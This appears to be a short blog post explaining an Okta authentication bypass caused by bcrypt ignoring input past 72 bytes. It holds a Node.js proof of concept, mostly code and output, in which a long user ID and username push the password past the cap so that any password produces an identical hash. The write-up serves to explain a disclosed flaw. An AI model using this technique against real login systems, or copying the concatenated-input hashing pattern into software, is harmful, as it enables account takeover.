Okta vulnerability explained (bcrypt auth bypass)

Cenk Kalpakoğlu, 05 Nov 2024
...

220.        /* cap key_len at the actual maximum supported
221.        * length here to avoid integer wraparound */
222.        if (key_len > 72)
223.            key_len = 72;

...
const bcrypt = require('bcrypt');

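const saltRounds = 10;

// This is how bcrypt has been used:
// bcrypt(userid + username + password)
//
// bcrypt only consumes the first 72 bytes of its input (the reference
// implementation caps key_len at 72); anything beyond that byte offset
// has no effect on the resulting hash.

// we don't know how the userIds are generated, so use UUIDv4 (36 bytes)
const userid = "b91fa9b4-69f1-4779-8d45-73f8653057f3";

// very long username (54 bytes)
const username = "my.very.long.username.with.more.characters@kondukto.io";

// userid + username is already 90 bytes, past the 72-byte cap, so the
// password portion of the concatenated input is never fed to bcrypt.
const prefix = userid + username;

// valid random password
const password = "randomStrongPassword";
const validInput = prefix + password;

// simulate bypass input -- can be anything, since it lands past the cap
const password2 = "AAAAAAAAAAAAAAAAAAA";
const bypassInput = prefix + password2;

// Hash both inputs with the same salt so the only difference between the
// two runs is the password portion; the printed hashes come out identical.
// Errors are surfaced instead of silently logging `undefined`.
bcrypt.genSalt(saltRounds, (saltErr, salt) => {
    if (saltErr) throw saltErr;

    bcrypt.hash(validInput, salt, (hashErr, hash) => {
        if (hashErr) throw hashErr;
        console.log(hash);
    });

    bcrypt.hash(bypassInput, salt, (hashErr, hash) => {
        if (hashErr) throw hashErr;
        console.log(hash);
    });
});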
└> node main.js
$2b$10$nI463MI5Jy9iCq1G6pAFxeiPQJm7jdIINwvs./c7ENYMI7ruPGUKe
$2b$10$nI463MI5Jy9iCq1G6pAFxeiPQJm7jdIINwvs./c7ENYMI7ruPGUKe
